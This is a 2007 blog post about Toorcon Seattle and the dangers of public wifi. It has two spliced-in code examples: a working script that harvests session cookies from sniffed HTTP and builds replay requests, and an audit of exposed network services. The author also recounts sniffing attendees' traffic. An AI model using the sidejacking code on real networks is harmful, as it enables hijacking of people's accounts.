Monday, May 14, 2007

Blogging Toorcon/Seattle

The San Diego cybersecurity convention Toorcon has branched northwards with a cool concept. This year, they held a small con (150 people) on the weekend after BlueHat (Microsoft's internal cybersecurity con). It was in a small bar, talks lasted 20 minutes, and the day ended with an hour of 5-minute "lightning" talks. The format rocked, hard.

I want to apologize for my talk. My talk was later in the day, so in the time leading up to the talk I was sniffing the wireless. (I wasn't alone; MANY other people were also sniffing the wireless.) I started my talk by showing the sorts of things I could sniff about somebody, such as their AIM buddy list, their DNS requests, alternate e-mail addresses they use, and so forth. The person I showed was somebody who had a diverse set of information, but not somebody who was doing anything embarrassing. I specifically chose NOT to 'out' the attendee who was surfing gay porn during the talks (although I probably should have, since virtually nobody who goes to cybersecurity cons would be embarrassed by surfing gay porn). However, even if nothing embarrassing is shown, it's still embarrassing to feel a bit exposed like that (although, I should repeat: a lot of people were sniffing the traffic as well; my talk just exposed it).

The moral of the story is: DON'T USE OPEN WIFI AT CYBERSECURITY CONVENTIONS. Seriously, any public wifi is dangerous. The dangers are:
1. I can sniff more interesting bits out of your traffic than you realize
2. I can hijack (or "sidejack") the web accounts you log into
3. I can grab control of your browser (download history, cached passwords, etc.)
4. I can probably break into your machine
5. This works on Internet Explorer and Firefox on Mac, Linux, and Windows
6. …all using well-known, unpatched (and often unpatchable, because they abuse what cleartext protocols do by design rather than any single bug) techniques

I've already released my Ferret tool that sniffs interesting info (like I showed at the start of my talk). I'm going to be releasing my "sidejacking" tool that sniffs Web 2.0 session IDs, allowing other people on the same wifi to gain access to your accounts even without man-in-the-middle attacks. I'm going to be releasing a "man-in-the-middle" tool that inserts JavaScript into your browser, essentially making every website you visit vulnerable to Cross Site Scripting (XSS) attacks against your browser.
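To make the sidejacking point concrete, here is an added example (my own illustration for this post, not code from the original page or from the author's Ferret or sidejacking tools). It walks a constructed capture of cleartext HTTP, as a sniffer on open wifi would see it, collects every cookie that crossed the air per host, and builds the request an attacker would send from their own machine to ride the session. The hosts, paths, cookie names and values are all invented; a real tool would feed the same bytes in from pcap after TCP reassembly.

```python
"""Passive sidejacking: harvest session cookies from sniffed cleartext HTTP.

Added example, not code from the original post or the author's tools.  The
capture below is constructed (invented hosts, paths, cookie names and
values) in the form a sniffer on an open wifi network would see it.
"""
from collections import defaultdict

# Constructed capture: HTTP messages in the order they crossed the air.
SNIFFED = [
    b"GET /login HTTP/1.1\r\nHost: webmail.example.com\r\n\r\n",
    b"HTTP/1.1 200 OK\r\n"
    b"Set-Cookie: SESSID=7f3a9c; Path=/; HttpOnly\r\n"
    b"Set-Cookie: strongauth=9b1e; Secure; HttpOnly\r\n"
    b"Set-Cookie: lang=en; Path=/\r\n"
    b"Content-Length: 0\r\n\r\n",
    b"GET /inbox HTTP/1.1\r\nHost: webmail.example.com\r\n"
    b"Cookie: SESSID=7f3a9c; lang=en\r\n\r\n",
    b"GET /feed HTTP/1.1\r\nHost: social.example.net\r\n"
    b"Cookie: auth=u42:deadbeef\r\n\r\n",
]


def parse_http(raw):
    """Split one HTTP message into start line, lower-cased header list and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return {"start": lines[0], "headers": headers, "body": body}


def header_values(msg, name):
    return [v for n, v in msg["headers"] if n == name]


def parse_cookie_header(value):
    """'a=1; b=2' -> {'a': '1', 'b': '2'} (the Cookie header a browser sends)."""
    jar = {}
    for part in value.split(";"):
        name, sep, val = part.strip().partition("=")
        if sep:
            jar[name] = val
    return jar


def parse_set_cookie(value):
    """Set-Cookie value -> (name, value, set of lower-cased attribute names)."""
    first, *attrs = [p.strip() for p in value.split(";")]
    name, _, val = first.partition("=")
    flags = {a.partition("=")[0].lower() for a in attrs if a}
    return name, val, flags


def sidejackable(set_cookie_value):
    """A cookie without the Secure flag will be sent over plain HTTP, so anyone
    on the same wifi can capture and replay it.  HttpOnly does NOT help here:
    it hides the cookie from page scripts, not from the wire."""
    _, _, flags = parse_set_cookie(set_cookie_value)
    return "secure" not in flags


def harvest(messages):
    """Build a per-host jar of every cookie that crossed the wire in the clear."""
    jars = defaultdict(dict)
    host = None
    for raw in messages:
        msg = parse_http(raw)
        if msg["start"].startswith("HTTP/"):
            # A response belongs to the most recent request's host.  Cookies
            # set with Secure only ever travel over HTTPS, so skip them.
            for sc in header_values(msg, "set-cookie"):
                name, val, flags = parse_set_cookie(sc)
                if host and "secure" not in flags:
                    jars[host][name] = val
        else:
            hosts = header_values(msg, "host")
            host = hosts[0] if hosts else None
            # Whatever the browser put in Cookie: was, by definition, sent in the clear.
            for c in header_values(msg, "cookie"):
                if host:
                    jars[host].update(parse_cookie_header(c))
    return dict(jars)


def build_replay(host, path, jar):
    """The request an attacker's own browser or proxy sends to ride the session."""
    cookie = "; ".join(f"{k}={v}" for k, v in jar.items())
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie}\r\n\r\n".encode()


if __name__ == "__main__":
    for host, jar in harvest(SNIFFED).items():
        print(host, jar)
        print(build_replay(host, "/", jar).decode())
```

Note what does and does not protect you: the `strongauth` cookie never shows up in the jar because it carries the Secure flag and the browser will only send it over HTTPS, while `SESSID` is harvestable even though it is HttpOnly. No man-in-the-middle is needed; the attacker only listens, which is why the page calls this sidejacking rather than hijacking.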

There are two good alternatives to public wifi. The first is to set up a box at home and VPN to it, and harden the wifi adapter so that nothing except the VPN client uses it directly: none of your normal system services (e.g. NetBIOS) should be bound to the adapter, so that the only thing the people sharing the hotspot can see is the encrypted tunnel.
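A check for the "nothing but the VPN is bound to the wifi adapter" part, as an added example (my own code for this post, not the author's). It reads a socket listing in the layout of Linux `ss -tulnp` output and reports every service that other people on the hotspot can reach, meaning anything listening on the wildcard address or on the wifi adapter's own address; services bound only to loopback or to the VPN tunnel address are fine. The listing, interface addresses and PIDs below are constructed for the example.

```python
"""Audit which listening services a wifi adapter exposes to the hotspot.

Added example, not the author's tooling.  Lines are in the shape of
`ss -tulnp` output; the addresses, processes and PIDs are constructed.
"""

WIFI_ADDR = "192.168.5.23"   # assumed address on the wifi adapter (wlan0)
VPN_ADDR = "10.8.0.6"        # assumed address on the VPN tunnel (tun0)
WILDCARDS = {"0.0.0.0", "*", "[::]", "::"}

# Constructed socket listing in `ss -tulnp` layout:
# Netid State Recv-Q Send-Q Local:Port Peer:Port Process
SS_OUTPUT = """\
Netid State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
udp   UNCONN 0      0            0.0.0.0:137        0.0.0.0:*     users:(("nmbd",pid=811,fd=15))
tcp   LISTEN 0      128          0.0.0.0:445        0.0.0.0:*     users:(("smbd",pid=812,fd=30))
tcp   LISTEN 0      128        127.0.0.1:631        0.0.0.0:*     users:(("cupsd",pid=700,fd=7))
tcp   LISTEN 0      128         10.8.0.6:22         0.0.0.0:*     users:(("sshd",pid=650,fd=3))
tcp   LISTEN 0      5       192.168.5.23:8080       0.0.0.0:*     users:(("python3",pid=9000,fd=4))
tcp   LISTEN 0      128             [::]:445           [::]:*     users:(("smbd",pid=812,fd=31))
"""


def parse_ss(text):
    """Return [(proto, local_addr, port, process_name)] for each socket line."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[0] == "Netid":
            continue  # header or blank line
        proto, local = fields[0], fields[4]
        addr, _, port = local.rpartition(":")   # handles [::]:445 as well
        proc = fields[6] if len(fields) > 6 else ""
        name = proc.split('"')[1] if '"' in proc else proc
        rows.append((proto, addr, int(port), name))
    return rows


def exposed_on_wifi(rows, wifi_addr, allowed_ports=frozenset()):
    """Sockets the hotspot's other users can connect to through the wifi adapter.

    A wildcard bind (0.0.0.0 / [::]) is reachable on every interface, including
    the wifi one; a bind to the wifi address is reachable by definition.  Binds
    to loopback or to the tunnel address are not reachable from the hotspot.
    """
    hits = []
    for proto, addr, port, name in rows:
        reachable = addr in WILDCARDS or addr == wifi_addr
        if reachable and port not in allowed_ports:
            hits.append((proto, addr, port, name))
    return hits


if __name__ == "__main__":
    for proto, addr, port, name in exposed_on_wifi(parse_ss(SS_OUTPUT), WIFI_ADDR):
        print(f"EXPOSED {proto} {addr}:{port} ({name})")
```

On this constructed listing the NetBIOS name service and SMB are exposed on every interface through the wildcard bind, and the local web server is bound straight to the wifi address; only CUPS (loopback) and sshd (tunnel address) pass. The audit is the verification step; the enforcement is a host firewall rule that drops everything on the wifi adapter except traffic to your VPN endpoint, plus, on Windows, unbinding file and printer sharing from that adapter.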

The second alternative is mobile broadband like GPRS, EDGE, HSDPA, or EVDO. You can often access the Internet by "tethering" your mobile phone, or get one of the new notebooks with a built-in adapter.

It's interesting to see that public wifi is still growing fast, with cities all across the United States creating municipal wifi networks. This means that more and more hackers will be attacking it. Now is a good time to start weaning yourself off of it.